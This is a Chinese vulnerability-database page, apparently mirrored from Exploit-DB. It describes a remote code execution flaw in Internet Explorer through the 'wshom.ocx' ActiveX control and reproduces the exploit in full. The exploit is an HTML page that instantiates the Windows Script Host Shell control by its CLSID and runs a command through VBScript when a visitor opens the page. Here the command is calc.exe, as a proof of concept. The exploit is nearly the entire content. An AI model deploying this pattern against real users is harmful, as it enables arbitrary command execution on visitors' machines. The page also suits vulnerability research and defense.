Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059022 漏洞类型
发布时间 2010-01-16 更新时间 2010-01-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11151
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#######################################################################
#IE ActiveX remote bof (remote code excution)
#version: all versions
#Author:    [germaya_x & D3V!L FUCKER]
#special thanx: [for my best friend his0k4].
#Geetz [2] :[Sarbot511 ,thrid-devil].
#tested on : windows 7 , windows vista ,windows xp sp2
#######################################################################
<html>
<p align="left"><b><font face="Segoe Script" size="7">                        
              
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>
<script language='vbscript'>

arg1="c:\WINDOWS\system32\calc.exe"

target.Exec arg1 

</script></p>